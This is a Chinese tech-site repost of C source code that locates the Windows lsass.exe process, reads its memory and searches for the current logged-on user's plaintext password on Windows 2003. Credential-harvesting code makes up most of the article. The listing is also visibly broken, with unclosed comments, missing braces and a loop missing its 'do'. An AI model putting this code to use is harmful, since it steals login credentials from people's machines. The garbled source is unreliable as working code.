当前位置: 王朝网络 >> vc >> XP 和2003的Lsass进程中明文密码

XP 和2003的Lsass进程中明文密码

王朝vc·作者佚名 2006-01-09

窄屏简体版字體: 小|中|大|超大

用Winhex读取XP和2003下的Lsass进程的内存数据,可以读取当前登录用户的明文密码.

source code:

//********************************************************************************

// Version: V1.0

// Coder: WinEggDrop

// Date Release: 12/15/2004

// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method

// Used Is Pretty Unwise,But This May Be The Only Way To Review The

// Logon User's Password On Windows 2003.

// Test PlatForm: Windows 2003

// Compiled On: VC++ 6.0

//********************************************************************************

#include <stdio.h>

#include <windows.h>

#include <tlhelp32.h>

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = {0}; // Store The Found Password

// Function ProtoType Declaration

//------------------------------------------------------------------------------------------------------

BOOL FindPassword(DWORD PID);

int Search(char *Buffer,const UINT nSize);

DWORD GetLsassPID();

BOOL Is2003();

//------------------------------------------------------------------------------------------------------

// End Of Fucntion ProtoType Declaration

int main()

{

DWORD PID = 0;

printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

if (!Is2003()) // Check Out If The Box Is 2003

{

printf("The Program Can't Only Run On Windows 2003 Platform\n");

return -1;

}

PID = GetLsassPID(); // Get The Lsass.exe PID

if (PID == 0) // Fail To Get PID If Returning Zerom

{

return -1;

}

FindPassword(PID); // Find The Password From Lsass.exe Memory

return 0;

}

// End main()

//------------------------------------------------------------------------------------

// Purpose: Search The Memory & Try To Get The Password

// Return Type: int

// Parameters:

// In: char *Buffer --> The Memory Buffer To Search

// Out: const UINT nSize --> The Size Of The Memory Buffer

// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",

// Since The Password Is Near The Above Location,But It's Not Always True That

// We Will Find The Magic String,Or Even We Find It,The Password May Be Located

// At Some Other Place.We Only Look For Luck

//------------------------------------------------------------------------------------

int Search(char *Buffer,const UINT nSize)

{

UINT OffSet = 0;

UINT i = 0;

UINT j = 0 ;

UINT Count = 0;

if (Buffer == NULL)

{

return -1;

}

for (i = 0 ; i < nSize ; i++)

{

/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word

Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate

The Magic String,We Have To Do It Manually And Slowly

if (Buffer[i] == 'L')

{

OffSet = 0;

if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)

{

OffSet += strlen("LocalSystem") + 1;

if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)

{

OffSet += strlen("Remote") + 1;

if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)

{

OffSet += strlen("Procedure") + 1;

if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)

{

i += OffSet;

break;

}

if (i < nSize)

{

ZeroMemory(Password,sizeof(Password));

for (; i < nSize ; i++)

{

if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)

{

/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In

That Way

j = i + 7;

for (; j < nSize; j += 2)

{

if (Buffer[j] > 0)

{

Password[Count++] = Buffer[j];

}

else

{

break;

}

return i + 7; // One Flag To Indicate We Find The Password

}

return -1; // Well,We Fail To Find The Password,And This Always Happens

}

// End Search

//------------------------------------------------------------------------------------

// Purpose: To Get The Lsass.exe PID

// Return Type: DWORD

// Parameters: None

//------------------------------------------------------------------------------------

DWORD GetLsassPID()

{

HANDLE hProcessSnap;

HANDLE hProcess = NULL;

PROCESSENTRY32 pe32;

DWORD PID = 0;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

if( hProcessSnap == INVALID_HANDLE_VALUE )

{

printf("Fail To Create Snap Shot\n");

return 0;

}

pe32.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hProcessSnap, &pe32))

{

CloseHandle(hProcessSnap); // Must clean up the snapshot object!

return 0;

}

{

if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)

{

PID = pe32.th32ProcessID;

break;

}

}while(Process32Next( hProcessSnap, &pe32));

CloseHandle( hProcessSnap);

return PID;

}

// End GetLsassPID()

//------------------------------------------------------------------------------------

// Purpose: To Find The Password

// Return Type: BOOLEAN

// Parameters:

// In: DWORD PID -> The Lsass.exe's PID

//------------------------------------------------------------------------------------

BOOL FindPassword(DWORD PID)

{

HANDLE hProcess = NULL;

char Buffer[5 * 1024] = {0};

DWORD ByteGet = 0;

int Found = -1;

hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process

if (hProcess == NULL)

{

printf("Fail To Open Process\n");

return FALSE;

}

if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet)) // Read The Memory From Lsass.exe

{

printf("Fail To Read Memory\n");

CloseHandle(hProcess);

return FALSE;

}

CloseHandle(hProcess);

Found = Search(Buffer,ByteGet); // Search The Password

if (Found >= 0) // We May Find The Password

{

if (strlen(Password) > 0) // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not

{

printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);

}

else

{

printf("Fail To Find The Password\n");

}

return TRUE;

}

// End FindPassword

//------------------------------------------------------------------------------------

// Purpose: Check If The Box Is Windows 2003

// Return Type: BOOLEAN

// Parameters: None

//------------------------------------------------------------------------------------

BOOL Is2003()

{

OSVERSIONINFOEX osvi;

BOOL b0sVersionInfoEx;

ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));

osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))

{

osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);

}

return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);

}

// End Is2003()

// End Of File

点击展开全文

上一篇：免费的C++ IDE: Visual C++ 2005 Express

下一篇：可切换视图的单文档静态分割窗口总结

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

没有找到您想要的？点此查看更多相关文章
相关文章▶

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12